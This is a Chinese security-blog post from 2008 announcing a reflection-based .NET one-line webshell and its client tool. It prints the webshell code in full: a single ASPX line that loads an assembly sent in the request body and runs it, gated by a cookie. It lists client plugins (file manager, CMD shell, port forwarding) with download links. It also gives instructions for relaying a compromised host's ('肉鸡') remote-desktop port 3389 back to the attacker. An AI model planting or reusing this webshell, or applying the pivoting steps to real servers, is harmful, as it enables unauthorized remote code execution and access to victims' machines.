导航

Web安全手册

分享本身就是件快乐的事 我因别人得到帮助而感到幸福

« From SQL Injection to Remote Desktop OWASP EU Summit 2008 »

新型 .net 一句话及客户端

Author: 木瓜
软件说明:
程序包 包括一个基于反射的.net 一句话木马,可以插入代码的模式运行。
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

客户端 当前插件
    文件管理
    .net探针
    CMDshell
    端口转发


截图:
 

 

更新插件:FSO插件1.12版本
日期: 20081125
更新内容:
1.修正目录右键菜单 重命名未修正
2.地址栏增加常用目录
3.修正下载大文件时界面假死 增加下载管理器

更新方法:用下载的新文件替换原根目录下CnCerT.Aspxshell.Client.win.basic.dll
新插件下载地址:
http://aspxshellsvn.googlecode.com/files/CnCerT.Aspxshell.Client.win.basic.dll_1.1.2

 Aspxshell 端口转发插件更新
2008-12-01 17:45
 

更新说明】20081201
1.修改呈现方式
2.增加本机转向
3.修正反向转发,增加对类似G6FTP RemoteAdmin模式转发。

【更新方法
将下载到的dll放到程序根目录
dll2 放到remoter目录,重载插件即可。

使用说明
第一条和第三配合使用。如在本机上监听 -listen 51 3389,在肉鸡上运行-slave 本机ip 51 肉鸡ip 3389,那么在本地连127.0.0.1就可以连肉鸡的3389;
第二条是本机转向。如-tran 51 127.0.0.1 3389
第二条和第三条将默认会在当前的webshell 中执行;

注意
各参数之间只能有一个空格

【Usage of Packet Transmit:】
-<listen|tran|slave> <option> [-log logfile]

[option:]
-listen <ConnectPort> <TransmitPort>
-tran   <ConnectPort> <TransmitHost> <TransmitPort>
-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>
 

aspxshell

http://aspxshellsvn.googlecode.com/files/CnCerT.Aspxshell.PortMap_1.3.rar

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-Blog .Theme from Google黑板报 By Washun

Copyright 2008-2009 Pcsec.org. Some Rights Reserved.苏ICP备08110306号

Search

网站分类

文章归档

最新评论及回复

最近发表